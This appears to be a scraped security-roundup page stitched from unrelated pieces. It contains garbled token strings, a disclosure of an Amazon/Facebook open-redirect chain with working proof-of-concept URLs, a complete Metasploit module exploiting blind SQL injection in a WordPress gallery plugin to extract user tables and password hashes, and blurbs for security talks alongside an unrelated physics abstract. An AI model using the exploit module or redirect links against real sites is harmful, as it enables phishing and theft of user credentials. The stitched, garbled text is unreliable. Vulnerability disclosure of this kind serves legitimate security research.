HDJvn7Cg5sqigvE_eVS895Eh6fSwxH3fgfWcNDrEl5_lFgRbrJ tC71R68rW_VXS9QCN7Po9wTWDnbyZTaXawdrdQyibryvA56Spr 5GcUDUboRFxy8YSr2ahUV_goDAQA3OKmCACEn8CmyMrOT5gZq3 iwusysdchRxLIv5N82-GMTiDxXXgkDYf1P7XwvklWpfy_cEItZzV5v0P7fRZB3qiq_RDx 9jhEzndlJhUJL2aWE0ldPmGKGz9xWyvPaPLOwzBo23GQbpj2ZN _tw9B9tz2l3tGIN1yegd_Wf6PSFIZOuBXfZILvmILcxg3qz4dH x1fmgPZBpf_34mPnMEkgZqbT2WeV_GZKz8RDIg88D3vrmwyMwW xeh3xyGuddjZUjOUjPCUwrgSrWZK3XHRA7TA7tWIsQ4X1bsjx9 c72mm8bZmmRBRJwqOcjsW0QEVETs_Cs9pS9QBkgX8yVPJCHuk1 v_xkj4EHHH9sNP7a4GRs8olklBTKhCcJ908sVrQVT2I-cQYw2SVU9hWaWWjX2AGt3WpdT2kx6SIPoPQpX5cIC4Lcfaa7Ec ZFBnoQPv3mR5BNHRFTh_6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBt j5 smz0ZeGT5JWvub5ORJ4xzVN0zAW8V4qiKiVFKTEFMZASaZFon4 1VFCbhxkX0Bi62Ko64PY6uP64tCMWh6yX2o0JMc0mJWFJRp169 5OCKgLXf0udRyWDESTyYgJXIlxecCmlwCEbleAsE-wtDXNOfDTXOzApr1sZO_58FBRaw-K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur9G7LfuXrCr5oR1J5LJ8s VupHqsiN7-UqdakiEEIBq750KxVjaAdCyqJp_5EJ-yVMK3f2pMX7cQ2Lw6u434hHimuLN9VDPLkpSiMlPOa8RkarDSr ed73IfQiv-PluegYDfunZFxj1KvcAlzhVZsL-a52hJmXrOrzKuV0hyZaBLtAIo6AEoXXV30D-6iraSUphkOFzYt3ah6oRrmXLQZKm2E8Cuag5d_rAnwvIr98dn4 OSa8Z4MCZemI3uH8cjxr86aE046uTA_Hm1GjYM5l7wkpHknHI8 QR2q5Cioo2h6WiUO-jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl18iaN8wkylsTk8aVBn6G 1xZadSL0b5R3NgsYfQUVtV0g9slnOLNkgq0NLMAk0kWFs *POC:* https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fa. php%3Fu%3Dhttp%253A%252F%252Fwww.stackoverflow.com %26mac%3DAQKyRHClixA20iGL%26__tn__%3D%252AB%26eid% 3DAQLAHC7szSXhT3FaEBXe5YFsOC0kEM4nN9PlVovdilvuzROS tFXoYqptlKpcJAzHNTLpxWAIrmJYsR6RVG_Htk6pgT7Iol6lWH DJvn7Cg5sqigvE_eVS895Eh6fSwxH3fgfWcNDrEl5_lFgRbrJt C71R68rW_VXS9QCN7Po9wTWDnbyZTaXawdrdQyibryvA56Spr5 GcUDUboRFxy8YSr2ahUV_goDAQA3OKmCACEn8CmyMrOT5gZq3i wusysdchRxLIv5N82-GMTiDxXXgkDYf1P7XwvklWpfy_cEItZzV5v0P7fRZB3qiq_RDx 9jhEzndlJhUJL2aWE0ldPmGKGz9xWyvPaPLOwzBo23GQbpj2ZN _tw9B9tz2l3tGIN1yegd_Wf6PSFIZOuBXfZILvmILcxg3qz4dH x1fmgPZBpf_34mPnMEkgZqbT2WeV_GZKz8RDIg88D3vrmwyMwW xeh3xyGuddjZUjOUjPCUwrgSrWZK3XHRA7TA7tWIsQ4X1bsjx9 c72mm8bZmmRBRJwqOcjsW0QEVETs_Cs9pS9QBkgX8yVPJCHuk1 v_xkj4EHHH9sNP7a4GRs8olklBTKhCcJ908sVrQVT2I-cQYw2SVU9hWaWWjX2AGt3WpdT2kx6SIPoPQpX5cIC4Lcfaa7Ec ZFBnoQPv3mR5BNHRFTh_6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBt j5smz0ZeGT5JWvub5ORJ4xzVN0zAW8V4qiKiVFKTEFMZASaZFo n41VFCbhxkX0Bi62Ko64PY6uP64tCMWh6yX2o0JMc0mJWFJRp1 695 OCKgLXf0udRyWDESTyYgJXIlxecCmlwCEbleAsE-wtDXNOfDTXOzApr1sZO_58FBRaw-K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur9G7LfuXrCr5oR1J5LJ8s VupHqsiN7-UqdakiEEIBq750KxVjaAdCyqJp_5EJ-yVMK3f2pMX7cQ2Lw6u434hHimuLN9VDPLkpSiMlPOa8RkarDSr ed73IfQiv-PluegYDfunZFxj1KvcAlzhVZsL-a52hJmXrOrzKuV0hyZaBLtAIo6AEoXXV30D-6iraSUphkOFzYt3ah6oRrmXLQZKm2E8Cuag5d_rAnwvIr98dn4 OSa8Z4MCZemI3uH8cjxr86aE046uTA_Hm1GjYM5l7wkpHknHI8 QR2q5Cioo2h6WiUO-jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl18iaN8wkylsTk8aVBn6G 1xZadSL0b5R3NgsYfQUVtV0g9slnOLNkgq0NLMAk0kWFs *(4) Amazon Covert Redirect Security Vulnerability Based on Facebook * Since Facebook is trusted by large numbers of other websites. Those vulnerabilities can be used to do "Covert Redirect" to other websites such as Amazon. The vulnerability exists at "redirect.html?" page with "&location" parameter, e.g. http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu %3Dhttp%253A%252F%252Fwww.google.com%26h%3D7AQFwCe YDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1 *More Details:* http://tetraph.com/covert_redirect/ http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html *(4.1)* When a user is redirected from Amazon to another site, Amazon will check parameters "&token". If the redirected URL's domain is OK, Amazon will allow the reidrection. However, if the URLs in a redirected domain have open URL redirection vulnerabilities themselves, a user could be redirected from Amazon to a vulnerable URL in that domain first and later be redirected from this vulnerable site to a malicious site. This is as if being redirected from Amazon directly. One of the vulnerable domain is, http://www.facebook.com *(4.2) * Use one of webpages for the following tests. The webpage address is " http://www.inzeed.com/kaleidoscope". Suppose it is malicious. *Vulnerable URL:* http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Famazon%3F v%3Dapp_165157536856903&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1 *POC:* http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu %3Dhttp%253A%252F%252Fwww.inzeed.com%26h%3D7AQFwCe YDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1 http://www.amazon.de/gp/redirect.html/ref=cm_sw_cl_fa_dp_1bI9sb0R0MNZH?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu %3Dhttp%253A%252F%252Fwww.nicovideo.jp%26h%3D7AQFw CeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1 http://www.amazon.co.uk/gp/redirect.html/ref=cm_sw_cl_fa_dp_Zzbbtb04XETQB?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu %3Dhttp%253A%252F%252Fwww.bbc.co.uk%26h%3D7AQFwCeY DAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1 http://www.amazon.ca/gp/redirect.html/ref=cm_sw_cl_fa_dp_G7uctb099ZX2N?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu %3Dhttp%253A%252F%252Fgoogleadservices.com%26h%3D_ AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1 https://www.amazon.co.jp/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww. facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww. pornhub.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_nd x4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051 https://www.amazon.fr/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww. facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww. naver.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4 h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051 https://www.amazon.it/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww. facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww. craigslist.org%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj _ndx4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051 *POC Video:* https://www.youtube.com/watch?v=ss3ALnvU63w&feature=youtu.be https://www.youtube.com/watch?v=f4W63YXnbIk *Blog Details:* http://securityrelated.blogspot.com/2015/01/amazon-covert-redirect-security.html Those vulnerabilities were reported to Facebook in 2014 and they have been patched. *POC Video:* https://www.youtube.com/watch?v=VvhmxfKt85Q&feature=youtu.be *Blog Details:* http://securityrelated.blogspot.com/2015/01/facebook-old-generated-urls-still.html -- Wang Jing School of Physical and Mathematical Sciences (SPMS) Nanyang Technological University (NTU), Singapore & Source

## # This module requires Metasploit: http://metasploit.com/download ## Current source: https://github.com/rapid7/metasploit-framework ### require 'msf/core' class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Wordpress Photo Gallery Unauthenticated SQL Injection User Enumeration", 'Description' => %q{ This module exploits an unauthenticated SQL injection in order to enumerate the Wordpress users tables, including password hashes. This module was tested against version 1.2.7. }, 'License' => 'ExploitHub', 'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module ], 'References' => [ ['CVE', '2014-2238'], ], 'Platform' => ['win', 'linux'], 'Privileged' => false, 'DisclosureDate' => "Feb 28 2014")) register_options( [ OptInt.new('GALLERYID', [false, 'Gallery ID to use. If not provided, the module will attempt to bruteforce one.', nil]), OptString.new('TARGETURI', [ true, 'Relative URI of Wordpress installation', '/']) ], self.class) end def get_params { 'tag_id' => 0, 'action' => 'GalleryBox', 'current_view' => 0, 'image_id' => 1, 'gallery_id' => 1, 'theme_id' => 1, 'thumb_width' => 180, 'thumb_height' => 90, 'open_with_fullscreen' => 0, 'open_with_autoplay' => 0, 'image_width' => 800, 'image_height' => 500, 'image_effect' => 'fade', 'sort_by' => 'order', 'order_by' => 'asc', 'enable_image_filmstrip' => 1, 'image_filmstrip_height' => 70, 'enable_image_ctrl_btn' => 1, 'enable_image_fullscreen' => 1, 'popup_enable_info' => 1, 'popup_info_always_show' => 0, 'popup_info_full_width' => 0, 'popup_hit_counter' => 0, 'popup_enable_rate' => 0, 'slideshow_interval' => 5, 'enable_comment_social' => 1, 'enable_image_facebook' => 1, 'enable_image_twitter' => 1, 'enable_image_google' => 1, 'enable_image_pinterest' => 0, 'enable_image_tumblr' => 0, 'watermark_type' => 'none', 'current_url' => '' } end def bruteforce_gallery_id 1.upto(666) do |i| get_vars = get_params get_vars['gallery_id'] = i res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'vars_get' => get_vars }) return i if res and res.body =~ /data\["0"\] = \[\];/ end fail_with(Failure::Unknown, "Couldn't bruteforce a gallery ID, please explicitly supply a known good gallery ID") end def run gallery_id = datastore['GALLERYID'] if gallery_id == 0 print_status('No GALLERYID supplied, attempting bruteforce.') gallery_id = bruteforce_gallery_id print_status("Found a gallery with an ID of #{gallery_id}") end parms = get_params parms['gallery_id'] = gallery_id res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'vars_get' => parms }) real_length = res.body.length count = nil 1.upto(999) do |i| payload = ",(SELECT (CASE WHEN ((SELECT IFNULL(COUNT(DISTINCT(schema_name)),0x20) FROM INFORMATION_SCHEMA.SCHEMATA) BETWEEN 0 AND #{i}) THEN 0x2061736320 ELSE 3181*(SELECT 3181 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))" res = send_injected_request(payload, gallery_id) count = i if res.body.length == real_length break if count end print_status("Looks like there are #{count} databases.") schemas = [] 0.upto(count-1) do |i| length = nil 1.upto(999) do |c| payload = ",(SELECT (CASE WHEN ((SELECT IFNULL(CHAR_LENGTH(schema_name),0x20) FROM (SELECT DISTINCT(schema_name) " payload << "FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{i},1) AS pxqq) BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 6586*" payload << "(SELECT 6586 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))" res = send_injected_request(payload, gallery_id) length = c if res.body.length == real_length break if !length.nil? end print_status("Schema #{i}'s name has a length of #{length}. Getting name.") name = '' 1.upto(length) do |l| 126.downto(32) do |c| payload = ",(SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(schema_name AS CHAR),0x20) FROM (SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{i},1) AS lela),#{l},1)) NOT BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 7601*(SELECT 7601 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))" res = send_injected_request(payload, gallery_id) vprint_status("Found char #{(c+1).chr}") if res.body.length == real_length name << (c+1).chr if res.body.length == real_length break if res.body.length == real_length end end schemas << name print_status("Found database #{name}") end schemas.delete('mysql') schemas.delete('performance_schema') schemas.delete('information_schema') schemas.each do |schema| num_tables = nil 1.upto(999) do |i| payload = ",(SELECT (CASE WHEN ((SELECT IFNULL(COUNT(table_name),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x#{schema.unpack("H*")[0]}) BETWEEN 0 AND #{i}) THEN 0x2061736320 ELSE 8846*(SELECT 8846 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))" res = send_injected_request(payload, gallery_id) num_tables = i if res.body.length == real_length break if num_tables end print_status("Schema #{schema} has #{num_tables} tables. Enumerating.") tables = [] 0.upto(num_tables - 1) do |t| length = nil 0.upto(64) do |l| payload = ",(SELECT (CASE WHEN ((SELECT IFNULL(CHAR_LENGTH(table_name),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x#{schema.unpack("H*")[0]} LIMIT #{t},1) BETWEEN 0 AND #{l}) THEN 0x2061736320 ELSE 5819*(SELECT 5819 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))" res = send_injected_request(payload, gallery_id) length = l if res.body.length == real_length break if length end print_status("Table #{t}'s name has a length of #{length}") name = '' 1.upto(length) do |l| 126.downto(32) do |c| payload = ",(SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x#{schema.unpack("H*")[0]} LIMIT #{t},1),#{l},1)) NOT BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 5819*(SELECT 5819 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))" res = send_injected_request(payload, gallery_id) name << (c+1).chr if res.body.length == real_length vprint_status("Found char #{(c+1).chr}") if res.body.length == real_length break if res.body.length == real_length end end print_status("Found table #{name}") tables << name if name =~ /users$/ end print_status("Found #{tables.length} possible user tables. Enumerating users.") tables.each do |table| table_count = '' char = 'a' i = 1 while char char = nil 58.downto(48) do |c| payload = ",(SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{schema}.#{table}),#{i},1)) NOT BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 8335*(SELECT 8335 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))" res = send_injected_request(payload, gallery_id) char = (c+1).chr if res.body.length == real_length vprint_status("Found char #{char}") if char table_count << char if char break if char end i = i + 1 end table_count = table_count.to_i print_status("Table #{table} has #{table_count} rows.") user_cols = ["ID", "user_url", "user_pass", "user_login", "user_email", "user_status", "display_name", "user_nicename", "user_registered", "user_activation_key"] 0.upto(table_count-1) do |t| user_cols.each do |col| i = 1 length = '0' char = 'a' while char char = nil 58.downto(48) do |c| payload = ",(SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(#{col}) AS CHAR),0x20) FROM #{schema}.#{table} ORDER BY ID LIMIT #{t},1),#{i},1)) NOT BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 7837*(SELECT 7837 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))" res = send_injected_request(payload, gallery_id) char = (c+1).chr if res.body.length == real_length vprint_status("Found char #{char}") if char length << char if char break if char end i = i + 1 end length = length.to_i print_status("Column #{col} of row #{t} has a length of #{length}") end end end end end def send_injected_request(payload, gallery_id) parms = get_params parms['gallery_id'] = gallery_id parms['order_by'] = 'asc ' + payload return send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'vars_get' => parms }) end end Source

NOTA 10! Malware Triage ~20% StaGc, ~80% Dynamic No Assembly Agenda: • StaGc Analysis • File Types • Analysis Tools • Dynamic Analysis • VirtualizaGon • ApplicaGon Tracing • Analysis Tools • Analysis Examples Read more: https://de8fb19ad1d3d0f3ae9ca0d766a8d63ddbee9f0f.googledrive.com/host/0B_qgg13Ykpypekw4d2hwLVJmeDg/REMacMalware.pdf

Abstract The S matrix of e–e scattering has the structure of a projection operator that projects incoming separable product states onto entangled two-electron states. In this projection operator the empirical value of the fine-structure constant ? acts as a normalization factor. When the structure of the two-particle state space is known, a theoretical value of the normalization factor can be calculated. For an irreducible two-particle representation of the Poincar´e group, the calculated normalization factor matches Wyler’s semi-empirical formula for the fine-structure constant ?. The empirical value of ?, therefore, provides experimental evidence that the state space of two interacting electrons belongs to an irreducible two-particle representation of the Poincar´e group. Keywords: quantum electrodynamics; fine-structure constant; entanglement; gauge invariance; reverse engineering Parts of this article were presented at the 7th International Conference On Quantum Theory and Symmetries (QTS7) in Prague 2011 [1]. Read more: http://arxiv.org/pdf/1004.0820.pdf

• Introduction • Firmware reverse engineering • Backdoor injection • Remote access • Discussion • Conclusion Read more: http://s3.eurecom.fr/~zaddach/docs/Recon14_HDD.pdf

Agenda • Definition – What is Social Engineering – Who are Social Engineers and What do They Want? • Tactics – Social Engineering Threat #1 – Social Engineering Tactics – Social Engineering Examples • Prevention Read more: http://phxsac.com/wp-content/uploads/2014/04/Social-Engineering-Auditing-the-Human-Factor.pdf

Social Engineering: Content • Content: – What is social engineering? – Types of social engineering & new age threats – How to use Facebook to ruin someone’s life – Countermeasures – Q&A Read more: https://www.owasp.org/images/5/54/Presentation_Social_Engineering.pdf

What is a Social Engineering Attack? ? There are three main methods used in social engineering: ? Phishing ? Phone elicitation ? Onsite impersonation What Can You Do? ? Three-step process for successfully combatting social engineering ? Be educated ? Get regular check ups ? Create critical thinking infrastructure Read more: http://www.rsaconference.com/writable/presentations/file_upload/hum-r02-phone-more-dangerous-than-malware-v2.pdf

Security strategies ? Trust - who can do what ? Principle of least privilege - lock down permissions as far as possible ? Defense in depth - multi layered protection to have fallbacks ? Software updates - rule out obvious exploits in Drupal, PHP, operating system, browser etc OWASP Top 10 ? Open Web Application Security Project ? List of most critical security risks ? Assessment of attack vector, weakness and impact read more: http://klau.si/sites/default/files/Cracking-Drupal-Devdays-2014.pdf

Whois NerveGas Worked as dev-team member on many of the early jailbreaks until around iOS 4. Author of five iOS-related O’Reilly books including “Hacking and Securing iOS Applications” Designed all of the iOS forensics techniques used in law enforcement and commercial products today Consulted closely with federal and local law enforcement agencies and US military on high profile projects and criminal cases Trained law enforcement worldwide in iOS forensics and penetration arts Read more: https://pentest.com/ios_backdoors_attack_points_surveillance_mechanisms.pdf

They wanted to retain end-to-end paradigm (which got broken by NAT). ¬ Security was not _that_ important, L4-7 security in the network was non-existent (firewalls were usually also proxies). ¬ Bandwidth was _expensive_. ¬ Multihoming (connectivity to 2 or more ISPs) was virtually non-existent. ¬ They thought they can impose a worldwide hierarchical addressing scheme (like telephone system), PI addresses were given out 15+ years after IPv6 started. - Which, btw, highlights another aspect: IETF and registries/policing orgs. are different organizations, with potentially very different agendas… Read more: https://www.ernw.de/download/TROOPERS_IPv6SecSummit_ERNW_IPv6_Structural_Deficits.pdf

At Flash Summit 2010, I gave a presentation on why secure erase is important. ? Four years later, that is no longer in question. ? Instead, now the focus is on technology options for Secure Erase (SE). ? There are three categories of secure erase techniques: ? Type-I software based secure erase ? Type-II hardware based secure erase ? Type-III self-destroy secure erase Read more: http://www.flashmemorysummit.com/English/Collaterals/Proceedings/2014/20140806_203B_Winters.pdf

Email Is Important for Business The Threat Landscape Cisco® Email Security Benefits Inbound Protection Outbound Control Customizable Offerings Read more: http://www.cisco.com/c/dam/en/us/products/collateral/security/cloud-email-security/cisco_email_security_customer_presentation.pdf

• Social Engineering • DEFCON Competition • Source of Problem • Countermeasures • Email • In-person • Smartphone • Social networking • Snail mail • Fixed phone Read more: http://csrc.nist.gov/organizations/fissea/2014-conference/presentations/fissea_2014_massaro.pdf